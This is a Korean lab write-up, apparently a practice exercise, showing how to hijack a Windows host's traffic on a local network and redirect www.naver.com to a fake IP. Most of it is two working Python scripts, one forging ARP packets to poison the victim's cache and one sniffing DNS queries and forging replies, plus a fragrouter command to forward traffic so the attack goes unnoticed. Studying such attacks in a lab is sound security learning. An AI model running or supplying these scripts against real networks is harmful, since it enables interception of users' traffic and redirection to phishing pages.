DNS Spoofing 실습

< DNS Spoofing >

공격 대상 : window

"www.naver.com" 의 아이피 주소를 "192.168.6.200" 으로 변조

window가 주소창에서 " www.naver.com " 을 입력했을 때 192.168.6.200 으로 이동된다

1> 먼저 " ARP Spoofing " 을 실행해야합니다

window    =>    게이트 웨이    => 외부

해당 게이트웨이의 MAC주소를 공격자의 MAC주소로 바꿔서 window로 보낸다

window    =>    게이트 웨이( 공격자 )    => 외부

window에서 외부로 나가는 패킷들은 공격자의 컴퓨터로 보내어진다

2> 공격자는 " Fragrouter " 툴을 이용해서 해당 패킷이 정상적으로 보내어지는 것처럼 위장한다

3> 프로그래밍한 " DNS_Spoofer " 프로그램을 통해서 " www.naver.com " 이라는 도메인에 대한 아이피를 질의할 때 응답을 보낸다

응답내용 : " www.naver.com "의 IP주소는 " 192.168.6.200 " 이다

* arping.py    - 공격대상의 맥 주소 테이블을 오염시키자 ( 게이트웨이 -> 공격자 PC )

import socket
from header.eth import *
from header.arp import *
 
sock = socket.socket( socket.AF_PACKET, socket.SOCK_RAW )
sock.bind( ('eth0', socket.SOCK_RAW) )
 
eth = Eth()
arp = Arp()
 
eth.dst = 'd0:50:99:92:db:e7'                       #타겟의 맥주소
eth.src = '00:0C:29:F0:62:73'
eth.type = 0x0806
 
arp.hw_type = 1 
arp.hw_size = 6 
arp.protocol_type = 0x0800
arp.protocol_size = 4 
arp.opcode = 1 
arp.target_mac ='00:00:00:00:00:00'
arp.target_ip = '192.168.6.254'
arp.sender_mac = '00:0C:29:F0:62:73'                # 공격자 맥주소
arp.sender_ip = '192.168.6.0'       # 라우터가 보낸것으로 위장
 
sock.send( eth.header + arp.header )
 
 
 
 
 

* dns_spoofer.py

import socket
import struct
import time
from header.packet import *
from header.eth import *
from header.ip import *
from header.udp import *
 
def make_chksum( header ): 
 
  size = len( header )
  if size % 2:
    header = header + b'\x00'
    size = len( header )
 
  size = size // 2
  header = struct.unpack('!' + str(size) + 'H', header )
  chksum = sum( header )
 
  carry = chksum & 0xFF0000
  carry = carry >> 16
  while carry != 0:
    chksum = chksum & 0xFFFF
    chksum = chksum + carry
    carry = chksum & 0xFF0000
    carry = carry >> 16
 
  chksum = chksum ^ 0xFFFF
  return chksum
 
raw = socket.socket( socket.PF_PACKET, socket.SOCK_RAW )
raw.bind( ('eth0', socket.SOCK_RAW) )
 
packet = ''
while True:
    data, addr = raw.recvfrom( 65535 )
    packet = Packet( data )
    if packet.eth.type == 0x0800 and packet.ip.type == 17  and packet.udp.dst == 53:
 
        name = packet.udp._data[12:]
        id = packet.udp._data[0:2]
        Flag = packet.udp._data[2:4]
        quest = packet.udp._data[4:6]
 
 
        name = name.split(b'\x00')
        name = name[0]
        domain = ''
        for x in name:
            if 48 <= x <= 57: domain += chr(x)
            elif 65 <= x <= 90: domain += chr(x)
            elif 97 <= x <= 122: domain += chr(x)
            else: domain += '.'
        domain = domain[1:]
 
        print( packet.udp._data )
        print( domain )
        print( "Transaction ID : " , id )
        print( "src Port : " , packet.udp.src )
 
        if domain == 'www.naver.com':   break
 
eth = Eth()
ip = Ip()
udp = Udp()
 
dns = packet.udp._data[0:2]
dns += b'\x81\x80'
dns += b'\x00\x01'
dns += b'\x00\x01'
dns += b'\x00\x00'
dns += b'\x00\x00'
dns += b'\x03www\x05naver\x03com\x00'
dns += b'\x00\x01'
dns += b'\x00\x01'  #question
dns += b'\x03www\x05naver\x03com\x00'   #answer
dns += b'\x00\x01'
dns += b'\x00\x01'
dns += b'\x12\x34\x56\x78'
dns += b'\x00\x04'
dns += b'\xc0\xa8\x06\xc8'
 
udp.dst = packet.udp.src
udp.src = packet.udp.dst
udp.length = 0
udp.chksum = 0
udp._data = dns
udp.length = len(udp.header)
 
ip.dst = packet.ip.src
ip.src = packet.ip.dst
ip.service = 0
ip.total = 0
ip.id = 1234
ip.flag = 0
ip.offset = 0
ip.ttl = 64
ip.type = 17
ip.ver = 4
ip.length = 20
ip.chksum = 0
 
ip.chksum = make_chksum( ip.header )
pseudo = ip._src + ip._dst + b'\x00' + ip._type + udp._length + udp.header
udp.chksum = make_chksum( pseudo )
 
eth.dst = packet.eth.src
eth.src = packet.eth.dst
eth.type = packet.eth.type
 
raw.send( eth.header + ip.header + udp.header )
 
 
 

#fragrouter -B1    사용자가 보내는 패킷을 외부로 보냄으로써 정상적인 작동으로 위장한다

#python3 arping.py

#python3 dns_spoofer.py

[ window 실행화면 ]

도멘인 아이피를 질의하는 nslookup 명령어를 사용했다

윈도우에서 게이트웨이(공격자)로 "www.naver.com" 도메인의 아이피주소를 질의하였다

해당 패킷은 공격자(가상서버)에게 전송되어지고 dns_spoofer 프로그램으로 인해 가짜 아이피주소가 윈도우로 보내진다

결과적으로 www.naver.com 의 아이피주소가 192.168.6.200 이라는 가짜 아이피주소로 변경되서 응답이 왔다

실제로 윈도우 주소창에 www.naver.com 을 검색하면 가짜 페이지로 이동하게 된다

아래는 dns_spoofer 동작화면이다

" www.naver.com "을 질의하는 패킷이 들어왔을 때 가짜응답을 보내는 프로그램이다

[ dns_spoofer 동작 화면 ]